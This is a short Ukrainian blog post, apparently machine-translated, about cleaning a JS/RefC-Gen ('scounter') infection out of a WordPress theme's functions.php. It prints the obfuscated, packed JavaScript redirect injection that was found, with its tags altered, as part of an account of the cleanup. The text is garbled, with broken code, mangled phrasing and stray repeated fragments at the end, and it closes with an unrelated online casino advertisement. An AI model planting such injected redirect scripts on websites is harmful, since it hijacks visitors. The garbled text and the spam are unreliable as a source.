Доброго дня!
А ви знали, що ваш сайт wordpress можуть заразити віруси? Ось і я знав, але як-то мало звертав на це увагу. Ну кому потрібен мій скромний сайт з величезним потенціалом, навіщо всі ці махи ... Стоп, точно, у мого сайту - величезний потенціал, зовсім з голови вилетіло ... Як і більшість сторінок з пошуку yandex.
Так, What The Fuck, що за biohazard поруч з назвою мого сайту !? Виявляється, мій сайт на wordpress заражений вірусом і його треба терміново підбадьорювати. А то 9, 8, 7 ...
Шановний Платон Щукін допоміг мені листом, в якому вказав код починається:
«[Script language =" JavaScript "] eval (function (p, a, c, k, e, r) {e = function (c) {return (c35? String.fromCharCode (c + 29): c.toString ( 36))}; if (! ». replace (/ ^ /, String)) {while (c-) r [e (c)] = k [c] || e (c); k = [function (e ) {return r [e]}]; e = function () {return '\\ w +'}; c = 1}; while (c-) if (k [c]) p = p.replace (new RegExp ( '\\ b' + e (c) + '\\ b', 'g'), k [c]); return p} ( 'or = ae, t = »», q; 5 (r.4 ( «m.»)! = - 1) t = »q»; 5 (r.4 ( «b.»)! = - 1) t = »q»; 5 (r.4 ( «c.»)! = -1) t = »p»; 5 (r.4 ( «f.»)! = »; 5 (r.4 (« i. »)! = - 1) t =» q »; 5 (t .6 && ((q = r.4 ( «?» + t + »=»))! = - 1 || (q = r.4 ( «&» + t + »=»))! = - 1)) jk = »l: // 9" + "1." + "n" + "3" + "." + "8" + "9.1" + "s /» + »up» + »v? w» + » d = 7 & t »+» x »+» y = »+ rz (q + 2 + t.6) .A (« & ») [0]; ', 37,37,' |||| indexOf | if | length ||| 2 || go | hp | si | er | ms | substring | split'.split ( '|'), 0, {})) [/ script]
Дужки в тегах змінені, щоб уникнути випадкового спрацьовування коду. »
Також, Яндекс видав мені сторінки, де ховається JS / RefC-Gen. Від нього і довелося лікувати сайту. Від цієї гадини, на яку я витратив цілу годину своєї чудової життя. Переглянувши вихідний код потрібних сторінок, я дійсно побачив схожий код. Залишилося питання: а як же його знайти і видалити?
Для цього я скачав все папки і файли з хостингу на ПК, попередньо перевіривши його на віруси, і вибрав пошук по папках, щоб знайти потрібну строчку коду. Для цього підійде Total Commander, наприклад.
Вірус називався scounter, але швидше за все, це один з «псевдонімів» JS / RefC-Gen. Чому називався? Тому що він був знайдений і знешкоджений. У файлі functions.php моєї теми.
Знайти і вилікувати, видалити вірус на сайті wordpress виявилося справою нескладною, якщо знати, де саме шкідливий код шукати.
Залишилося трохи почекати результатів перевірки роботом і знову мій сайт повернеться на вершину або ближче до вершини, він щось у мене перспективний. :)
Успіхів! Знайти і видалити вам вірус на wordpress. А краще не зустрічатися з цією заразою. Все буде добре!
Хочете весело провести час в інтернеті і при цьому трохи заробити? тоді кращі інтернет казино рунета до ваших послуг. Ресістріруйтесь і отримуйте найпривабливіші бонуси казино навіть без депозиту. Випробуй удачу!
C35?«?
S /» + »up» + »v?
Залишилося питання: а як же його знайти і видалити?
Чому називався?
Хочете весело провести час в інтернеті і при цьому трохи заробити?